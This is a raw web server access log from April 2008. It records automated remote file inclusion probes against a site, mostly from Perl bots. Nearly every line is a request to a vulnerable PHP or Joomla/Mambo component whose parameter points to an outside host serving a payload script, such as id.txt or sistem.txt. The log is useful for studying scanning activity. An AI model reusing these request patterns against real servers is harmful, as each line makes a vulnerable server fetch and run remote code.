72.18.192.224 - - [08/Apr/2008:09:19:02 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.192.224 - - [08/Apr/2008:09:19:02 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:19:32 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:19:39 -0700] "GET /logs/(chimot)http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:19:39 -0700] "GET /(chimot)http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:19:57 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:19:58 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:20:03 -0700] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.92.158.55 - - [08/Apr/2008:09:20:48 -0700] "GET /logs/index.php?pageurl=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
209.92.158.55 - - [08/Apr/2008:09:20:52 -0700] "GET /index.php?pageurl=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
200.230.71.1 - - [08/Apr/2008:09:21:12 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:21:23 -0700] "GET /logs/access_080106.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [08/Apr/2008:09:21:23 -0700] "GET /@rfihttp://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:21:51 -0700] "GET /logs/access_080108.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.91.249.193 - - [08/Apr/2008:09:22:02 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [08/Apr/2008:09:22:11 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.212.173.42 - - [08/Apr/2008:09:22:11 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:22:43 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:22:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:22:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:23:03 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:23:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:23:04 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:23:16 -0700] "GET /logs/access_080101.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:23:29 -0700] "GET /(chimot)http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:23:29 -0700] "GET /logs/(chimot)http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:24:04 -0700] "GET /logs/access_080219.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:24:05 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:24:05 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:24:09 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.102.67 - - [08/Apr/2008:09:24:09 -0700] "GET //matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.202.102.67 - - [08/Apr/2008:09:24:12 -0700] "GET /logs//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:24:22 -0700] "GET /logs/access_080219.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:24:22 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:24:23 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:24:29 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:24:43 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:24:44 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:24:44 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:24:48 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:24:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:24:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:24:58 -0700] "GET /logs/access_080125.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:25:10 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:25:14 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:25:29 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:25:35 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.119 - - [08/Apr/2008:09:25:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:25:43 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.16.166 - - [08/Apr/2008:09:25:43 -0700] "GET /logs/access_080129.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.63.3 - - [08/Apr/2008:09:26:27 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.63.3 - - [08/Apr/2008:09:26:27 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.63.3 - - [08/Apr/2008:09:26:27 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:26:34 -0700] "GET /logs/access_080108.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [08/Apr/2008:09:26:48 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:26:57 -0700] "GET /logs/access_080101.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:26:59 -0700] "GET /logs/access_080126.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:27:06 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:27:12 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:27:31 -0700] "GET //matic/include/libchart-1.1/libchart.php?tm_includepath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:27:31 -0700] "GET /logs//matic/include/libchart-1.1/libchart.php?tm_includepath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:28:01 -0700] "GET /logs/access_080125.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:09:28:02 -0700] "GET /logs/access_070725.log HTTP/1.0" 200 66166 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:09:28:02 -0700] "GET /logs/access_070731.log HTTP/1.0" 200 34839 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.63.3 - - [08/Apr/2008:09:28:25 -0700] "GET /logs/access_080329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.63.3 - - [08/Apr/2008:09:28:53 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:28:53 -0700] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:29:00 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:29:00 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:29:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:29:32 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.202.102.67 - - [08/Apr/2008:09:29:39 -0700] "GET //matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.202.102.67 - - [08/Apr/2008:09:29:40 -0700] "GET /logs//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:30:15 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:30:15 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:30:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:30:42 -0700] "GET /logs/access_080213.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:30:58 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:31:00 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:31:00 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:31:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:31:21 -0700] "GET /logs/access_071214.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:32:30 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:32:31 -0700] "GET /logs/access_071217.log//inc/header.php/step_one.php?server_inc=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:32:31 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:33:09 -0700] "GET /logs/access.log/xGB.php?act=admin&do=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:33:25 -0700] "GET /xGB.php?act=admin&do=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:33:25 -0700] "GET /logs/xGB.php?act=admin&do=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.22.162.60 - - [08/Apr/2008:09:33:30 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=http://www.sohbetsuper.org/modules/shoutbox/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:33:44 -0700] "GET /logs/access_080213.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:33:53 -0700] "GET /logs/access_071214.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:33:59 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:34:13 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:34:44 -0700] "GET /logs/access_071225.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:34:55 -0700] "GET /logs/access_071215.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:34:55 -0700] "GET /logs/access_080308.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:35:00 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:35:00 -0700] "GET //config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:35:01 -0700] "GET /logs//config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:09 -0700] "GET /logs/access_080128.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:35:22 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:24 -0700] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:25 -0700] "GET /logs/access_080129.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:25 -0700] "GET /logs/access_080309.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:30 -0700] "GET /logs/access_071227.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:30 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:32 -0700] "GET /logs/access_071230.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:40 -0700] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
